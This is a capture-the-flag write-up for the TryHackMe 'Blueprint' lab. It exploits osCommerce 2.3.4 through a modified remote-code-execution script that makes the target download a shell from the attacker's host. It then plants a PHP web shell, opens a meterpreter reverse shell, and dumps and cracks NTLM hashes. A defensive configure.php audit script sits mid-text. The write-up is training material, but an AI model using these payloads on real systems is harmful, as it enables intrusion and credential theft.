THM Writeup – Blueprint
Hack into this Windows machine and escalate your privileges to Administrator.
Do you have what it takes to hack into this Windows machine?
Add the IP address to your hosts file:
echo '10.10.32.200 blueprint.thm' >> /etc/hosts
Scan the target machine – find the open ports first:
nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv blueprint.thm
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 128
135/tcp open msrpc syn-ack ttl 128
139/tcp open netbios-ssn syn-ack ttl 128
443/tcp open https syn-ack ttl 128
445/tcp open microsoft-ds syn-ack ttl 128
3306/tcp open mysql syn-ack ttl 128
8080/tcp open http-proxy syn-ack ttl 128
49152/tcp open unknown syn-ack ttl 128
49153/tcp open unknown syn-ack ttl 128
49154/tcp open unknown syn-ack ttl 128
49158/tcp open unknown syn-ack ttl 128
49159/tcp open unknown syn-ack ttl 128
49160/tcp open unknown syn-ack ttl 128
Get more details about the open ports (version and script scan):
nmap -T4 -A -p 80,135,139,443,445,3306,8080,49152-49154,49158-49160 blueprint.thm
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Check the web application on port 80: browse to http://blueprint.thm
[Screenshot: server error]
Same as nmap found, of course 🙂
Check the web application on port 443: browse to https://blueprint.thm
[Screenshot: blueprint app on port 443]
Explore the oscommerce folder:
[Screenshot: oscommerce directory]
When we click on the catalog directory, there is some web site:
[Screenshot: eshop web app]
It's probably the osCommerce web site.
When we click on the docs directory, there is the detailed osCommerce documentation:
[Screenshot: oscommerce docs directory]
Now let's check port 8080: browse to http://blueprint.thm:8080
[Screenshot: blueprint web app on port 8080]
It looks like the same as on port 443 – when we check it, we’ll find out that it is exactly the same.
As we have Oscommerce 2.3.4 running on http://blueprint.thm:8080/oscommerce-2.3.4/catalog/, let’s check if there is an exploit for this product:
root@ip-10-10-211-38:~# searchsploit oscommerce 2.3.4
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
osCommerce 2.3.4 - Multiple Vulnerabilities | php/webapps/34582.txt
osCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Inject | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injecti | php/webapps/46330.txt
osCommerce 2.3.4.1 - Arbitrary File Upload | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py
---------------------------------------------- ---------------------------------
We're going to use the Remote Code Execution exploit, file 44374.py.
Locate the exploit and copy it to the current directory:
root@ip-10-10-240-99:~# locate php/webapps/44374.py
/opt/searchsploit/exploits/php/webapps/44374.py
root@ip-10-10-240-99:~# cp /opt/searchsploit/exploits/php/webapps/44374.py .
We need to modify the script: change base_url and target_url so they point to where osCommerce is running in our case, and also add your PHP payload:
import requests

# enter the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://blueprint.thm:8080/oscommerce-2.3.4/catalog/"
target_url = "http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*
payload = '\');'
payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.10.240.99:8000/shell.php shell.php");'
payload += 'echo $var;'
payload += '/*'
data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)
if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.$
else:
    print("[-] Exploit did not execute as planned")
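The weakness this script relies on is an osCommerce catalog whose install/ directory was never removed and whose includes/configure.php is still writable, so the DB_DATABASE value can break out of its define() with the "'); PAYLOAD; /*" format shown in the comments above. The following audit is an added example written for this writeup (not osCommerce code and not part of the exploit): it flags a leftover install directory, a writable configure.php, and a define line that no longer has the shape install.php writes. The configure.php samples are constructed, and the audit_catalog path argument is hypothetical.

```python
import os
import re
from pathlib import Path
# Constructed sample in the shape install.php writes (header comment, defines, DB block).
CLEAN = """<?php
/* osCommerce configuration file, header comment as shipped */
  define('ENABLE_SSL', false);
  define('DB_SERVER', 'localhost');
  define('DB_SERVER_USERNAME', 'osc');
  define('DB_SERVER_PASSWORD', 'secret');
  define('DB_DATABASE', 'oscommerce');
  define('STORE_SESSIONS', 'mysql');
?>
"""
# Constructed sample: the same file after a step=4 request carrying the "'); PAYLOAD; /*"
# quote-break format the writeup injects into DB_DATABASE.
TAMPERED = CLEAN.replace(
    "define('DB_DATABASE', 'oscommerce');",
    "define('DB_DATABASE', ''); $var = shell_exec(\"cmd.exe /C whoami\"); echo $var; /*');",
)
DEFINE_RE = re.compile(r"^define\('[A-Z_]+',\s*('[^']*'|true|false)\);$")

def audit_configure(text: str) -> list[str]:
    """Return findings for one configure.php body; an empty list means it looks clean."""
    # Blank out properly closed /* ... */ blocks (keeping the line count) so the shipped
    # header is ignored; an injected, unterminated /* survives, and so does the code before it.
    body = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group().count("\n"), text, flags=re.S)
    findings = []
    for lineno, line in enumerate(body.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(("<?php", "?>", "//")):
            continue
        if DEFINE_RE.match(stripped):
            continue  # well-formed define('NAME', 'value'); line as install.php writes it
        kind = "malformed define (quote-break injection?)" if stripped.startswith("define(") else "unexpected code"
        findings.append(f"line {lineno}: {kind}: {stripped[:70]}")
    return findings

def audit_catalog(catalog) -> list[str]:
    """Hardening checks for one osCommerce catalog root (the exposure used in the writeup)."""
    catalog, findings = Path(catalog), []
    if (catalog / "install" / "install.php").exists():
        findings.append("install/ directory still present: remove it after installation")
    conf = catalog / "includes" / "configure.php"
    if conf.exists():
        if os.access(conf, os.W_OK):  # tests the user running this script, not the web user
            findings.append("includes/configure.php is writable: make it read-only")
        findings += audit_configure(conf.read_text())
    return findings
```

Run it against the catalog root of a deployment you administer; a clean, hardened install returns an empty list.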
Create a .php file that takes a cmd query parameter, so we can issue commands to the OS through the application, and then start a python3 web server to host it:
root@ip-10-10-211-38:~# echo '<?php echo system($_GET["cmd"]); ?>' > shell.php
root@ip-10-10-240-99:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Run the exploit:
root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Click on the url provided by the exploit and wait for the execution.
Now browse to http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami
[Screenshot: shell php]
Ehm, there is a filter. Never mind, we'll try to bypass it: overwrite shell.php:
root@ip-10-10-240-99:~# echo '<?php echo shell_exec($_GET["cmd"]); ?>' > shell.php
Run the exploit again:
root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Visit the link again:
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Now browse to http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami
[Screenshot: shell php whoami]
Great, this works and we are running as the privileged nt authority\system user, so let's upload a reverse shell.
Generate a reverse shell using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.240.99 LPORT=4242 -f exe > shell.exe
Run the python http server again:
root@ip-10-10-240-99:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Modify the payload in your exploit script:
[Screenshot: payload]
Run metasploit and get multi/handler ready:
root@ip-10-10-240-99:~# msfconsole
msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.240.99
LHOST => 10.10.240.99
msf5 exploit(multi/handler) > set LPORT 4242
LPORT => 4242
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.240.99:4242
Run the exploit again:
root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Visit configure.php and wait for the execution:
[Screenshot: multi handler]
Now we have a shell on the target machine.
Let’s dump the hashes:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
meterpreter >
To crack the hash, use for example https://crackstation.net/:
[Screenshot: crackstation]
Now you can answer the first question:
"Lab" user NTLM hash decrypted
The root flag should be on the Administrator’s desktop:
meterpreter > cd C:/Users/Administrator/Desktop
meterpreter > pwd
C:\Users\Administrator\Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-04-11 23:36:47 +0100 desktop.ini
100666/rw-rw-rw- 37 fil 2019-04-11 23:40:59 +0100 root.txt.txt
meterpreter > cat root.txt.txt
THM{[REDACTED]}